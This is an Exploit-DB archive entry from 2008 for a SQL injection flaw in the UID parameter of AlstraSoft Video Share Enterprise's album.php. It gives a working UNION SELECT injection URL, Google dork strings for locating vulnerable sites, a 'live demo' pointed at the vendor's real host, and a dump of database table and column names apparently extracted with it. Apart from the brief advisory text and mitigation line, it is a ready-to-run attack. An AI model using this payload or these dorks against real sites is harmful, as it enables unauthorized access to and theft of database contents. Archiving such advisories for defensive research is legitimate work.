Video Share Enterprise (UID) Remote SQL Injection Vulnerability

vendor:

Video Share Enterprise

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: Video Share Enterprise

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Video Share Enterprise (UID) Remote SQL Injection Vulnerability

Video Share Enterprise is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow malicious users to modify queries.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Video Share Enterprise (UID) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://www.alstrasoft.com/videoshare.htm
|
| DorK   : Powered By AlstraSoft Video Share Enterprise
| DorK   : inurl:"album.php?UID="
| DorK   : inurl:"view_picture.php?viewkey="
|___________________________________________________|

Exploit:  


www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


L!VE DEMO: :

http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

________________________
table_name : column_name


 adv:adv_status
 adv:adv_text
 adv:adv_name
 adv:adv_id
 audio:embed
 audio:be_rated
 audio:be_comment
 audio:filehome
 audio:rate
 audio:ratedby
 audio:fav_num
 audio:featured
 audio:com_num
 audio:viewnumber
 audio:vkey
 audio:country
 audio:location
 audio:record_date
 audio:adddate
 audio:addtime
 audio:type
 audio:duration
 audio:duration
 audio:flvdoname
 audio:vdoname
 audio:channel
 audio:keyword
 audio:featuredesc
 audio:UID
 audio:description
 audio:VID

________________________



____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|   
| Iraqihack | FAHD | mos_chori | Silic0n 
|
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-07-17]